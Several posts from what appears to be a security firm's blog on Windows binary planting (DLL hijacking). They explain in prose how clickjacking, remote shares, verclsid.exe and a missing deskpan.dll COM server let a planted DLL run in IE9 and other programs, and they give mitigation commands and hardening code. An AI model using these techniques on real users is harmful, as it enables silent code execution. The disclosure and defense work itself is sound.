Two tricks are employed in the background of this attack. The first is aimed at launching applications without double-clicking. One of the methods we found for this makes use of the default Windows XP Task View, i.e., the task list shown in Windows Explorer on the left of each folder view. When a printable document is selected in the folder, this task list includes the "Print this file" link which, when (single-) clicked upon, launches the application associated with the file type of the selected file and instructs it to initiate the printing process. The procedure is thus: 1) click the file in a remote special folder to select it, and 2) click "Print this file" to launch the application, which then loads a malicious DLL.

The second trick is clickjacking. This old trick is simply used for hiding the actual attack inside a 1x1 iframe such that wherever the user clicks on the web page the first time (anywhere on the page, not only on links), he actually clicks inside this tiny iframe - precisely on the Wordpad document shown in a remote shared folder, thereby selecting this document. The iframe then repositions its remote content such that when the user clicks again, he actually clicks on the "Print this file" link in the same remote shared folder as before, thereby launching Wordpad and executing the malicious DLL inside it. Now, since most attackers want to hide their attacks as much as possible, we made the demo such that when the user clicks inside the tiny iframe, we detect that and simulate the click on the underlying web page as well, which is why the links apparently clicked on actually respond to the clicks.

For those of you preferring the schematic diagrams, here's how it works in the language of objects, arrows and annotations (taken from our Hack In The Box slides).




Web Attack 2: Internet Explorer 9 on Windows 7 With Protected Mode


We've already seen that applications can be made vulnerable through unsafe COM servers on Windows 7 just like on Windows XP. But there are two additional challenges here. First, Windows 7 doesn't have the task view that Windows XP does, so another way to avoid double-clicking had to be found. And second, you can't just launch any application from IE in protected mode without popping up the yellow security warning.

For the first challenge we chose to reveal a "right-click, send to compressed (zipped) folder" trick. IE allows the user to right-click a folder inside a remote shared folder (without a warning), and then select "send to" and "compressed (zipped) folder" from the context menu. This triggers a process of compression, which sets the current working directory of IE to the remote shared folder - and completes the first part of the attack.

The second challenge was overcome with the help of verclsid.exe. This curious little executable, mostly unknown to users, gets frequently launched in the background and quickly terminates without any visible effect. Verclsid.exe is, ironically, a security measure introduced by a Windows security update associated with bulletin MS06-015, but to us it is interesting because it is "whitelisted" for the IE protected mode: when IE launches a new verclsid.exe process, the user doesn't have to okay a security warning. Furthermore, verclsid.exe instantiates the COM server associated with the extension of a chosen special folder, providing just the binary planting opportunity we need. In our attack, we trigger the launching of verclsid.exe by loading a number of different special folders in an additional 1x1 iframe while IE has its current working directory set to our remote shared folder. Since verclsid.exe is launched by IE, it also inherits IE's current working directory (which hosts our "malicious" DLL) and eventually loads our DLL. The attack is again hidden with clickjacking.

Let's see how the user experiences this attack. Visiting a malicious web site, right-clicking anywhere on the page and selecting "send to" and "compressed (zipped) folder" from the context menu is enough to get a remote binary executed on his computer.





Again, the schematic diagram of the attack:







Lessons Learned

The main takeaway from our presentation was that binary planting, as a conceptual problem with loading binaries on Windows, is not at all a trivial problem if you really understand the numerous details and hidden processes that affect and enable it.

By shedding light on a few previously unknown attack vectors we only revealed a small portion of our advanced binary planting research, which is aimed at improving the exploitation of various binary planting vulnerabilities. If we want to convince developers to fix security defects, we need to show them that these are easy to exploit, and we hope to see some proactive effort as a result of our work. And this is by no means aimed towards Microsoft alone; it was simply easiest for us to use the components that come with Windows, but we found a large number of other vendors' products to be exploitable in the ways described above.


How To Protect Yourself?

Apart from our generic recommendations for administrators, a couple of additional temporary measures will protect you from the attacks described in this post (but unfortunately not from numerous similar attacks):


  1. On Windows XP, delete the {42071714-76d4-11d1-8b24-00a0c9068ff3} registry key under HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID.
  2. On Windows 7, copy ehTrace.dll from C:\Windows\ehome to the System32 folder.
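
From an elevated command prompt, these two steps translate roughly to the following one-liners (double-check the paths on your own system before running them):

  reg delete "HKLM\SOFTWARE\Classes\CLSID\{42071714-76d4-11d1-8b24-00a0c9068ff3}" /f
  copy C:\Windows\ehome\ehTrace.dll C:\Windows\System32\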

What's next?

We'll continue to raise awareness of this vulnerability class we call binary planting. There's a lot of misunderstanding about it among developers as well as security researchers, and we'll do our best to change that. Our first humble milestone is to stop seeing new product versions making unsafe LoadLibrary calls. Unfortunately, we don't seem to be anywhere close to that.


(Again, most of the above research has been done by Luka Treiber, security researcher at ACROS Security.)

Tuesday, May 10, 2011

"Binary Planting" vs. "DLL Hijacking" vs. "Insecure Library Loading"

Binary Planting's Multiple Identities

When a new thing occurs or is invented, or when a previously obscure thing becomes popular, a need emerges to give it a name so we can talk and write about it. It was no different with binary planting, DLL hijacking, DLL preloading, insecure library loading, DLL load hijacking and DLL spoofing. Except that, unfortunately, these different names all describe essentially the same thing - an attack* against a Windows application where this application loads a malicious executable instead of some intended legitimate one. We get asked a lot why we choose to use the term binary planting, so here's our reasoning.

One major reason for us to dislike the words "DLL" or "library" in the name is that this problem affects not only dynamic-link libraries but also other types of executables. Furthermore, "DLL" sounds as if the insecurely loaded library always has a ".dll" extension - which is not the case, as our research has found applications trying to load libraries with extensions ".ocx", ".nls", ".tbp" and many other funny extensions. We chose to use the noun binary, which covers all types of executables involved in these vulnerabilities. So why not simply use executable? Executable is too long a word and would probably quickly be shortened to "EXE," causing a misunderstanding similar to the one we already have with "DLL."

As for other shortcomings of the alternative terms:


  • DLL hijacking implies that either a DLL gets hijacked or something gets hijacked using a DLL. But in the large majority of binary planting vulnerabilities the binary (for instance, a DLL) in question does not exist - that is, until the attacker plants it. You can't hijack something that doesn't exist. One could say that a vulnerable application gets hijacked through a malicious DLL, but then every vulnerability could be called hijacking of some sort. Note, however, that before Windows XP SP2, the dynamic-link library search order had the current working directory in 2nd place, which produced a lot of possibilities to actually hijack an existing DLL (e.g., one from the Windows system folder) by placing a malicious copy with the same name in the current working directory. Back then, hijacking would have sounded more suitable.
  • DLL preloading implies that some presumably malicious DLL gets loaded in advance (of something). We find no such advance-loading process taking place in the context of this vulnerability.
  • Insecure (library) loading sounds accurate as long as it's only libraries one considers. When other executables (EXEs or COMs, for example) join the party, loading is not a very suitable term any more. While technically these also get loaded before they're executed, it's more common - and more understandable - to say they get run, started, executed or launched.
  • DLL load hijacking is a little better than DLL hijacking as it implies that it is the process of loading that gets hijacked (and used for malicious purposes). However, this term contains an unfortunate hard-to-pronounce triple-L, and is likely to quickly (d)evolve into DLL hijacking. And again - just like with insecure library loading -, loading is not a very suitable term for non-library executables (EXEs, COMs, etc.).   
  • DLL spoofing is actually a nice term, short and accurate, but has long been widely used for another similar but conceptually very different activity, namely manually replacing an existing DLL on one's own computer in order to change the behavior of an application or operating system. This activity has nothing to do with security, at least not in terms of one person (attacker) doing something bad to another person (user), since the user does it to himself, so to speak.   

We chose the verb planting because, in our opinion, it accurately describes what the attacker needs to do in order to carry out the attack: planting a malicious binary somewhere where a vulnerable application will pick it up and execute it.

So these are our reasons for preferring the term binary planting to other alternatives for describing the entire scope of the problem. As it currently seems, DLL hijacking (for describing an attack) and insecure library loading (for describing a vulnerability) are here to stay as well, at least for libraries. This will certainly continue to cause unneeded confusion but perhaps a vulnerability class that has been overlooked for such a long time deserves more than one name.


(* Strictly speaking, the term insecure library loading does not describe an attack, but a vulnerability.)

Friday, May 6, 2011

Silently Pwning Protected-Mode IE9 and Innocent Windows Applications

Binary Planting Through COM Servers

This blog post sets the stage for our Hack In The Box presentation in Amsterdam on May 19.

[Update: Find the continuation of this blog post here.]

Those familiar with Windows COM servers know that they come in two types, in-process and out-of-process. For this post, the former type is of interest: an in-process COM server is a dynamic-link library (DLL) that a COM client instantiates when needed, usually by calling the CoCreateInstance function with the class identifier (CLSID) of the said COM server. What happens then is that the COM initialization code looks up the provided CLSID in the local registry under the HKEY_CLASSES_ROOT\CLSID key, and finds the path to the DLL under the InProcServer32 subkey. It then expands any environment strings in the obtained DLL path and calls LoadLibrary with the resulting path. Whatever happens afterwards is of no interest to us here.
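
A simplified sketch of that lookup (our own code, not COM's actual implementation) makes the plantable step obvious:

  #include <windows.h>
  #include <wchar.h>
  #pragma comment(lib, "advapi32.lib")

  // CLSID -> InProcServer32 default value -> environment string expansion
  // -> LoadLibrary.
  HMODULE LoadInprocServerDll(const wchar_t* clsid) {
      wchar_t keyPath[256];
      swprintf(keyPath, 256, L"CLSID\\%ls\\InProcServer32", clsid);

      HKEY hKey;
      if (RegOpenKeyExW(HKEY_CLASSES_ROOT, keyPath, 0, KEY_READ, &hKey) != ERROR_SUCCESS)
          return NULL;

      wchar_t dllPath[MAX_PATH] = L"";
      DWORD size = sizeof(dllPath);
      RegQueryValueExW(hKey, NULL, NULL, NULL, (LPBYTE)dllPath, &size);  // default value
      RegCloseKey(hKey);

      wchar_t expanded[MAX_PATH];
      ExpandEnvironmentStringsW(dllPath, expanded, MAX_PATH);

      // If "expanded" is just a name like "deskpan.dll" (a relative path),
      // the standard DLL search order applies and the current working
      // directory eventually gets consulted.
      return LoadLibraryW(expanded);
  }

The last call is an ordinary LoadLibrary, so everything said elsewhere on this blog about the DLL search order applies to it unchanged.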

From the binary planting perspective the above process would be vulnerable if both of the following conditions were met:


  1. the path to the COM server DLL is a relative path instead of an absolute one; and
  2. the DLL doesn't exist in the LoadLibrary search path prior to the current working directory (i.e., in COM client's home directory or any one of the Windows system folders).  


Condition #1 is at the discretion of whoever registers the COM server. While most COM servers are registered with full absolute paths to their DLLs, some merely specify the name of the DLL without the path. This may not be due to a developer's oversight or laziness: the so-called side-by-side COM components (see here and here) require the DLL to be specified with a relative path.

Condition #2 is a bit more tricky, as it seems unlikely at first glance that someone - or some application - would register a COM server that doesn't exist on the system. But for reasons beyond our willingness to investigate, some software products do just that. Furthermore, some other software products fail to unregister their COM servers upon removal, leaving the user's computer with exploitable remnants of a removed COM server DLL. And finally, in the case of side-by-side COM components, these DLLs are successfully found and loaded when the COM server is invoked by the original application (the DLL is in the same folder as the COM client executable), but if another application tries to invoke the same COM server, it won't find the DLL and will finally try to find it in the current working directory - to the attacker's great satisfaction.

If you're now asking yourself whether such cases where both conditions are met actually exist: we did a quick search on our testing systems and found a few, one of them being preinstalled, so to speak, on every Windows XP machine, and others being introduced by various software products. Let's take a look at the "preinstalled" XP case.


The "preinstalled" XP binary planting vulnerability

On every Windows XP machine, there exists an in-process COM server named "Display Panning CPL Extension" with CLSID {42071714-76d4-11d1-8b24-00a0c9068ff3}. Truth be told, we don't know what its purpose is, and neither does the searchable Internet, but the DLL it specifies under the InProcServer32 subkey is "deskpan.dll". This is a relative path to a DLL that doesn't seem to exist on any XP system, and thus meets both of the above conditions.

Therefore, if any Windows process tries to create an instance of this COM server for whatever reason, and the current working directory of that process is set to an attacker-controlled location (possibly on a remote share), the attacker can plant a malicious deskpan.dll and have the said process load and execute it on user's computer.



Windows 7, Vista, and well-registered COM servers

Naturally, such an attack also works on Windows 7 and Windows Vista as well as older Windows systems, as long as some registered COM server fulfills the above conditions. But it does, as usual, get even worse: we found that many well-registered COM servers on all Windows versions, having specified their DLL with an absolute path, load additional DLLs with a relative path, and many of these DLLs do not exist. This provides extensive binary planting potential to a great number of flawed LoadLibrary calls that could previously be considered non-exploitable. Yes, on all fully up-to-date Windows versions without any additional software installed.


The questions that now remain unanswered are:


  1. how to get some Windows process on user's computer to try to initialize a chosen vulnerable COM server; and
  2. how to get the current working directory of that process to point to the attacker's remote share?  


At the Hack in the box conference in Amsterdam on May 19, we will answer these questions by demonstrating two of our previously unpublished hacks:


Demo #1: Exploiting innocent Windows applications

First we will demonstrate how various applications on your Windows 7, Vista or XP can be forced to initialize any vulnerable COM server, and load a malicious DLL in the process. We'll show how Microsoft Word 2010 and PowerPoint 2010 execute a malicious DLL upon opening a document on Windows 7 (something that doesn't occur under normal circumstances), even in "protected view."  


Demo #2: Pwning protected-mode IE9 without warnings

And as if that weren't enough, we will show how this technique can be leveraged to launch a binary planting attack against Internet Explorer 8 on Windows XP as well as against Internet Explorer 9 in protected mode on Windows 7 - without any suspicious double-clicks or security warnings. (For the impatient: it's not through ActiveX controls.)


We look forward to seeing you in the audience and sharing our research with you. Of course we will also tell you how to avoid introducing the described vulnerabilities in your own software creations and how to protect your web browsing experience from the perils of binary planting. In the meantime, we've updated our Binary Planting Guidelines For Developers accordingly.

(Credit for the above research goes mostly to Luka Treiber, security researcher at ACROS Security.)

Wednesday, April 13, 2011

Microsoft Patches Binary Planting Issues In Various Vendors' Products

That is, after making them vulnerable in the first place

Last October our company reported that Microsoft Visual Studio 2010 and 2008 (we didn't test 2005) injected an easily exploitable binary planting vulnerability into every MFC (Microsoft Foundation Class) application built with these development environments - and also into any other application using the Visual C++ redistributable libraries. The number of affected applications was, and still is, potentially pretty high: out of just over 200 applications we tested in our binary planting research project, thirteen (~ 6%) were found to be suffering from this flaw (some of them also had, or still have, other binary planting issues).

These are the "dirty thirteen" we found, although keep in mind that the "dirty" part is not their developers' fault. Also note that while some of these products may have had subsequent updates and versions, these are likely to be vulnerable as well unless they were substantially re-coded as non-MFC applications.


  1. Autodesk 3ds Max 2010 Release 12.0
  2. Autodesk 3ds Max 2011 Release 13.0
  3. Avast! Free Antivirus 5.0.545
  4. Avira Premium Security Suite 10.0.0.542
  5. BitDefender Total Security 2010 - Build 13.0.17.343
  6. CorelDraw X5 15.1.0.588
  7. Corel Paint Shop Pro Photo X3 13.2.0.41
  8. CyberLink PowerDirector 8.00.2220
  9. EMC QuickScan Pro Demo 4.7.0 (build 8554)
  10. EMC ApplicationXtender Document Manager v6.50.124.0
  11. Microsoft Office Professional 2010 14.0.4760.1000 (32-bit)
  12. Nuance PDF Converter Professional 6.0
  13. PC Security Shield Security Shield 2010 13.0.16.313

This week Microsoft finally fixed this bug in the Visual C++ redistributable packages (apparently, version 2005 was vulnerable too). Now, does this fix magically make things right for end users? Not entirely. If you're using a vulnerable product that dynamically loads the Visual C++ redistributable package, installing the correct security update(s) will resolve the problem and remove the vulnerability. All of the above-listed applications will, for example, be fixed. However, MFC applications that statically link the MFC libraries effectively integrate them into their executables and do not use the (now fixed) redistributable libraries. Such applications will have to be re-built with an updated Visual Studio and redistributed to end users.

Recommendations

  • Users should apply the security updates for Visual C++ redistributable packages.
  • Visual Studio developers should apply the applicable security updates and re-build MFC applications that statically link MFC libraries (and, obviously, distribute the new build to end users); see also the hardening sketch below.
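
In addition to applying the updates, developers looking for extra defense in depth against this class of attacks can remove the current working directory from their process's DLL search path early at startup. This is a general hardening measure rather than part of Microsoft's fix; a minimal sketch using the documented SetDllDirectory API follows:

#include <windows.h>

int wmain()
{
    // Calling SetDllDirectory with an empty string removes the current working
    // directory from the DLL search path for the rest of the process lifetime
    // (available since Windows XP SP1). Subsequent relative-name LoadLibrary
    // calls made anywhere in the process will no longer fall back to a
    // potentially attacker-controlled working directory.
    SetDllDirectoryW(L"");

    // ... the application's normal initialization continues here ...
    return 0;
}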

Tuesday, January 11, 2011

How To Secure a Security Product

And Whose Bug Is It, Anyway?

Our company issued a security advisory today about a binary planting vulnerability in multiple F-Secure products, including F-Secure Internet Security 2011. F-Secure issued automatically deployed fixes for this vulnerability last month, and all affected users can at this moment safely be presumed safe, so to speak. Before going any further, it has to be said that F-Secure Corporation was extremely responsive and cooperative throughout the process of resolving this issue, and demonstrated a high level of commitment to the security of their users.

Now, two facts are of interest in this case. First, the remotely exploitable code-execution bug is in a security product. Security products are specifically designed to protect computer systems, so when one such product makes it possible to attack a system that might otherwise not be vulnerable, it seriously compromises that product's main purpose - namely, to protect the system. Think about it: if there's a code-execution vulnerability in a web browser or in document editing software, these products may still perform their mission and allow you to browse web pages or write documents, even though they also allow attackers to own your computer. In other words, their main "purpose in life" has not been compromised, and their value to the user may remain unaffected. But when a security product is vulnerable, it begins to provide the exact opposite of what it was purchased for - insecurity instead of security.

Second, the remotely exploitable code-execution bug was not "developed" by the vendor's developers: it resided in Nokia's Qt, a cross-platform application and UI framework, which F-Secure's developers trusted and integrated into their products. Such trust is often extended, and can be highly economical - the whole idea behind 3rd-party programming libraries is the division of labor, the concept that allowed mankind to prosper so enormously. Why develop some special and complex functionality yourself if you can license it from someone with expertise who has already developed it, and quite possibly better than you would have? It saves time and money, and makes your product more competitive. There's just this small pesky issue of security. What if such 3rd-party code includes vulnerabilities that will "infect" your product when you integrate it? How can you even know? And who will be to blame for these bugs in your product?

Mind you, we've been discovering vulnerabilities in security products for more than a decade now, helping their vendors fix them before these bugs could put their users at risk. Vendors of security products are well aware that any vulnerabilities in their products have the potential to directly affect their revenue, and not in a good way (a sentiment not shared by many non-security product vendors). If you sell security products, it helps if your prospects believe that you're actually going to increase, not decrease, their security. However, this is a difficult goal to achieve: security software is like any other software - increasingly complex, full of 3rd-party (often closed) code, developed rapidly to meet deadlines set by marketing, and built on a limited budget. All these factors are vulnerability-friendly.

So what should security product vendors do to keep vulnerabilities out of their products?


  1. They need to obtain more assurance of the security of all 3rd-party code they integrate in their products. This can be done by having the source code reviewed by skilled experts (if the source code is available), or having the built product reviewed in a black box manner;
  2. They need to have their own code reviewed by either internal or external vulnerability hunters before the products are deployed to users. Developers are people, people make mistakes, mistakes often evolve into functional or security problems, functional problems can be caught by QA but security problems generally can't;
  3. They need to keep an eye on newly discovered vulnerability types that may affect their products. Binary planting is one such case; others include SSL certificate null-termination attacks, remote file inclusion, session fixation and many more;
  4. They need to keep an eye on discovered vulnerabilities in the 3rd-party code they integrate. When such vulnerabilities are publicly known, attackers will quickly find vulnerable products and will try to exploit them.

How does this arguably incomplete list differ from what other (non-security) software vendors should do? From a pure security perspective, it really doesn't, as any product running on a computer - regardless of its declared function - can provide an entry point for attackers, although products running with higher privileges (as security products often do) are riskier. But from a business perspective, security software vendors would be smart to go the extra mile. Security is their sole functionality and their only purpose. It's hard to convince a customer that you will secure their system if you don't seem able, or willing, to secure your own product.

Security software vendors are, by the nature of their products, expected to provide not only premium security software but also premium software security. In a world where many software vendors as well as users seem to have conceded that security is a reactive game where attackers always win, security vendors may be our best hope for driving progress in code security and vulnerability prevention, and for showing that secure software is not, in fact, a myth.